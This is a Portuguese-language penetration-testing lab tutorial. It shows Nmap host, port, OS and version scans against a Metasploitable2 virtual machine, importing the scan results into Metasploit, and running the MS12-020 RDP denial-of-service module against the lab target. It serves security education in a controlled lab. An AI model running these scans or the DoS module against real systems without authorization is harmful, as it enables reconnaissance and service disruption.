Introdução
Neste laboratório, você aprenderá como usar Nmap e Metasploit para varredura de rede e análise de vulnerabilidades. Nmap (Network Mapper) é um utilitário de código aberto poderoso para descoberta de rede e auditoria de segurança, enquanto Metasploit é uma estrutura de teste de penetração amplamente utilizada que inclui uma variedade de ferramentas de exploração e payloads.
O objetivo deste laboratório é fornecer a você experiência prática no uso do Nmap para realizar vários tipos de varreduras, analisar os resultados e aproveitar o Metasploit para explorar ainda mais as vulnerabilidades potenciais em um sistema alvo.
Configurando o Ambiente
Nesta etapa, você configurará o ambiente do laboratório, iniciando o container Kali Linux e a máquina virtual Metasploitable2.
sudo virsh start Metasploitable2
Aguarde o início da máquina alvo, o que pode levar de 1 a 3 minutos.
Teste se a máquina virtual está em execução fazendo ping nela:
ping 192.168.122.102
Em seguida, inicie o container Kali Linux e entre em seu ambiente bash:
docker run -ti --network host b5b709a49cd5 bash
Teste a conexão de rede virtual no container Kali, use Ctrl-C para sair do ping:
ping 192.168.122.102
Uso Básico do Nmap
Nesta etapa, você aprenderá como usar o Nmap para tarefas básicas de varredura, como descoberta de hosts, varredura de portas, detecção de versão e detecção de sistema operacional.
Realize uma varredura abrangente executando o seguinte comando:
nmap -T4 -A 192.168.122.102
Varra a descoberta de host executando o seguinte comando:
nmap -T4 -sn 192.168.122.102
Realize uma varredura de portas executando o seguinte comando:
nmap -T4 192.168.122.102
Realize a detecção do sistema operacional executando o seguinte comando:
nmap -T4 -O 192.168.122.102
A opção -T4 define o modelo de tempo para uma varredura agressiva, enquanto a opção -A habilita a detecção do sistema operacional, varredura de versão, varredura de script e traceroute. A opção -sn realiza uma varredura simples de descoberta de host, e a opção -O tenta detectar o sistema operacional remoto.
Uso Avançado do Nmap
Nesta etapa, você explorará técnicas de varredura Nmap mais avançadas, como varredura de sub-redes inteiras, intervalos de portas específicos e especificação de interface de rede.
Varra uma sub-rede inteira executando o seguinte comando:
nmap 127.0.0.1/24
Varra portas específicas executando o seguinte comando:
nmap -p80,22,66 127.0.0.1
Liste as interfaces de rede locais executando o seguinte comando:
nmap --iflist
Especifique a interface de rede executando o seguinte comando:
nmap -e eth0 127.0.0.1
Essas técnicas avançadas permitem que você ajuste suas varreduras e colete informações mais detalhadas sobre a rede ou hosts de destino.
Importando Resultados da Varredura Nmap no Metasploit
Nesta etapa, você aprenderá como importar os resultados da varredura Nmap no Metasploit para análise e exploração adicionais.
- Realize uma varredura abrangente e salve a saída em um arquivo XML executando o seguinte comando e certifique-se de colocar o arquivo XML no diretório home
~/. Esta etapa pode levar algum tempo:
nmap -sV -Pn -oX ~/shiyanlou.xml 192.168.122.102/24
- Inicie o console do Metasploit:
cd ~
service postgresql start
msfdb init
msfconsole
- Importe o arquivo XML no Metasploit executando o seguinte comando no console do Metasploit:
db_import shiyanlou.xml
- Visualize os serviços importados executando o seguinte comando no console do Metasploit:
services
- Pressione Ctrl+D para sair do console do Metasploit e, em seguida, inicie a inspeção
Ao importar os resultados da varredura Nmap no Metasploit, você pode aproveitar as ferramentas e módulos poderosos disponíveis no framework Metasploit para analisar e potencialmente explorar vulnerabilidades no sistema de destino.
Usando Módulos no Metasploit
Nesta etapa, você aprenderá como pesquisar e usar módulos dentro do framework Metasploit.
- Antes de tudo, se você não estiver no console do Metasploit, deverá iniciar o console do Metasploit:
cd ~
msfconsole
- Agora, você pode pesquisar módulos usando o comando
searchno console do Metasploit:
search ms12-020
- Para usar um módulo no console do Metasploit:
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
- Mostrar as opções disponíveis para o módulo no console do Metasploit:
show options
- Definir as opções necessárias no console do Metasploit:
set RHOST 192.168.122.102
- Executar o módulo no console do Metasploit:
exploit
- Pressione Ctrl+D para sair do console do Metasploit e, em seguida, inicie a inspeção
O Metasploit oferece uma ampla gama de módulos para vários propósitos, como exploits, payloads, módulos auxiliares e muito mais. Ao pesquisar e usar o módulo apropriado, você pode tentar explorar vulnerabilidades ou realizar outras ações no sistema de destino.
Resumo
Neste laboratório, você aprendeu como usar o Nmap para varredura de rede e coleta de informações, bem como como importar os resultados da varredura para o Metasploit para análise e exploração adicionais. Você adquiriu experiência prática com várias técnicas de varredura Nmap, incluindo descoberta de hosts, varredura de portas, detecção de versão e detecção de sistema operacional. Além disso, você aprendeu como pesquisar e usar módulos dentro do framework Metasploit para potencialmente explorar vulnerabilidades no sistema de destino.
Ao longo do laboratório, você praticou habilidades essenciais para testes de penetração, como configurar um ambiente controlado, realizar reconhecimento e analisar potenciais vulnerabilidades. Essas habilidades são cruciais no campo da segurança cibernética e o ajudarão a desenvolver uma compreensão mais profunda dos conceitos de segurança de rede e das técnicas de hacking ético.



